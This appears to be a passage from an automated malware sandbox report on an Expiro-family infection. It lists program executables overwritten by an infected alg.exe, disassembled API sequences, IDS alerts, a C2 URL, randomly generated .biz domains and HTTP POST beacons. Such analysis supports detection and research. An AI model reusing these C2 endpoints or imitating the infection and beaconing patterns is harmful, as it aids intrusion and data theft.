                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02CF5908
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_00EF0207
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_00EF589A
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose,7_2_00F03E66
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,7_2_00EE532E
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_00EF589A
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00EF0207
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00F03E66
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_00EE532E
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02337394h14_2_02337099
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 023378DCh14_2_0233767B
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_02337E60
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_02337E5E
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_02337FBC

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49753 -> 54.244.188.177:80
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:55012 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:52903 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:54094 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:54498 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:55974 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49867 -> 82.112.184.197:80
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50012 -> 18.141.10.107:80
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:64255 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50077 -> 18.246.231.120:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://gxe0.com/yak2/233_Juqmtmyadyy
                    Queries random domain names (often used to prevent blacklisting and sinkholes)
                    Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                    Source: unknownNetwork traffic detected: DNS query count 63
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0E4B8 InternetCheckConnectionA,0_2_02D0E4B8
                    Source: global trafficTCP traffic: 192.168.2.10:49774 -> 51.195.88.199:587
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49708 -> 198.252.105.91:443
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.10:49744
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.10:49757
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.10:49744
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.10:49757
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.10:49773
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.10:49773
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.10:50017
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.10:50017
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.10:50016
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.10:50018
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.10:50016
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.10:50018
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.10:50029
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.10:50029
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.10:50031
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.10:50031
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.10:50077
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.10:50077
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.10:50015
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.10:50015
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.10:50078
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.10:50086
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.10:50086
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.10:50078
                    Source: global trafficTCP traffic: 192.168.2.10:49774 -> 51.195.88.199:587
                    Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /omhtttbpfwdopn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                    Source: global trafficHTTP traffic detected: POST /ulvxycyjutwdmypq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /nkbiquv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                    Source: global trafficHTTP traffic detected: POST /eupqxdgegqjrgdpv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /irvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                    Source: global trafficHTTP traffic detected: POST /s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xwcotmorefmmtc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                    Source: global trafficHTTP traffic detected: POST /kgrfegimyutt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                    Source: global trafficHTTP traffic detected: POST /rvwdmrjan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mbuec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                    Source: global trafficHTTP traffic detected: POST /avc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /qmpy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                    Source: global trafficHTTP traffic detected: POST /blhkiobysomvisx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /aatpwqmmnwrfjm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hrkmkab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
